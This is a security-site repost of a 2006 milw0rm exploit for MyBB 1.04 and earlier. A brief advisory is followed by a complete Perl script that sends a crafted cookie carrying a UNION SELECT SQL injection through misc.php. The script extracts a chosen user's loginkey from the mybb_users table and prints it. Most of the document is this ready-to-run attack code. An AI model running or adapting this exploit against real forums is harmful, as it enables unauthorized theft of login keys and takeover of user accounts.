首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MyBB version 1.04 and prior SQL Injection Exploit
来源:http://www.milw0rm.com 作者:Devil-00 发布时间:2006-03-17  

MyBB SQL Injection (Exploit)

Summary
"MyBB is a powerful, efficient and free forum package developed in PHP and MySQL."

Lack of input filtering allows attackers to perform SQL injection on MyBB.

Credit:
The information has been provided by Devil-00.

Details
Vulnerable Systems:
* MyBB version 1.04 and prior

Exploit:
#!/usr/bin/perl -w

# MyBB <= 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3
#
# Milw0rm ID :-
# http://www.milw0rm.com/auth.php?id=1539
# D3vil-0x1 | Devil-00 < BlackHat > :)
#
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
use IO::Socket;

##-- Start --#

$host = "127.0.0.1";
$path = "/mybb3/";
$userid = 1;
$mycookie = "mybbuser=1_xommhw5h9kZZGSFUppacVfacykK1gnd84PLehjlhTGC1ZiQkXr;";

##-- _END_ --##
# $host :-
# The Host Name Without http:// | exm. www.vic.com
#
# $path :-
# MyBB Dir On Server | exm. /mybb/
#
# $userid :-
# The ID Of The User U Wanna To Get His Loginkey
#
# $cookie :-
# You Must Register Username And Get YourCookies ( mybb_user ) Then But it Like This
#
# $cookie = "mybbuser=[YourID]_[YourLoginkey];";
$sock = IO::Socket::INET->new (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp"
) or die("[!] Connect To Server Was Filed");
##-- DONT TRY TO EDIT ME --##
$evilcookie = "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=$userid/*;";
##-- DONT TRY TO EDIT ME --##
$evildata = "GET ".$path."misc.php?action=buddypopup HTTP/1.1\n";
$evildata .= "Host: $host \n";
$evildata .= "Accept: */* \n";
$evildata .= "Keep-Alive: 300\n";
$evildata .= "Connection: keep-alive \n";
$evildata .= "Cookie: ".$mycookie." ".$evilcookie."\n\n";

print $sock $evildata;

while($ans = <$sock>){
$ans =~ m/<a href=\"member.php\?action=profile&uid=1\" target=\"_blank\">(.*?)<\/a><\/span><\/td>/ && print "[+] Loginkey is :- ".$1."\n";
}

#EoF




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·KnowledgebasePublisher 1.2 Rem
·Mercur IMAPD Buffer Overflow (
·Microsoft Windows Telephony Se
·A vulnerability in HT 9.1 Expl
·Apple OSX Mail.app RFC1740 Rea
·X.Org X11 (X11R6.9.0/X11R7.0)
·PeerCast nextCGIarg Function R
·BomberClone Buffer Overflow Ex
·PeerCast nextCGIarg Function R
·Apple Mac OS X File Rewrites a
·Dvbbs 7.1 boke.asp SQL Injecti
·FarsiNews Remote File Inclusio
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved